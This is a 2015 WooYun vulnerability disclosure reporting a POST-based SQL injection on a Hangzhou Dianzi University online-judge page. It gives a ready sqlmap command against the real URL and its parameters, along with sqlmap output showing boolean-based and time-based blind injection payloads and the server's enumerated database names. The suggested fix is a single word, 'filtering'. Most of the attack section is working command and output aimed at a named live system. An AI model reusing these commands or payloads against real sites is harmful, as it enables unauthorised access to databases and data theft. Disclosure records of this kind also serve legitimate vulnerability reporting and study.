当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099146

漏洞标题:杭州电子科技大学某站SQL注入

相关厂商:杭州电子科技大学

漏洞作者: 路人甲

提交时间:2015-03-03 17:42

修复时间:2015-03-08 17:44

公开时间:2015-03-08 17:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-03: 细节已通知厂商并且等待厂商处理中
2015-03-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注入

详细说明:

POST型注入
sqlmap.py -u "http://acm.hdu.edu.cn/compare.php?action=compare" --data "name1=test152&name2=test152"

漏洞证明:

E:\sqlmapproject-sqlmap-bf1c08a>sqlmap.py -u "http://acm.hdu.edu.cn/compare.php?
action=compare" --data "name1=test152&name2=test152" --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150202}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 20:20:39
[20:20:39] [INFO] resuming back-end DBMS 'mysql'
[20:20:39] [INFO] testing connection to the target URL
[20:20:39] [WARNING] reflective value(s) found and filtering out
[20:20:39] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y
[20:20:41] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[20:20:41] [WARNING] no WAF/IDS/IPS product has been identified
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: name1 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: name1=test152' AND 4569=4569 AND 'FeVv'='FeVv&name2=test152
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: name1=test152' AND SLEEP(5) AND 'nHyZ'='nHyZ&name2=test152
---
[20:20:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[20:20:41] [INFO] fetching database names
[20:20:41] [INFO] fetching number of databases
[20:20:41] [INFO] resumed: 6
[20:20:41] [INFO] resumed: information_schema
[20:20:41] [INFO] resumed: hdoj
[20:20:41] [INFO] resumed: hdojbbs
[20:20:41] [INFO] resumed: mysql
[20:20:41] [INFO] resumed: performance_schema
[20:20:41] [INFO] resumed: test
available databases [6]:
[*] hdoj
[*] hdojbbs
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-08 17:44

厂商回复:

最新状态:

暂无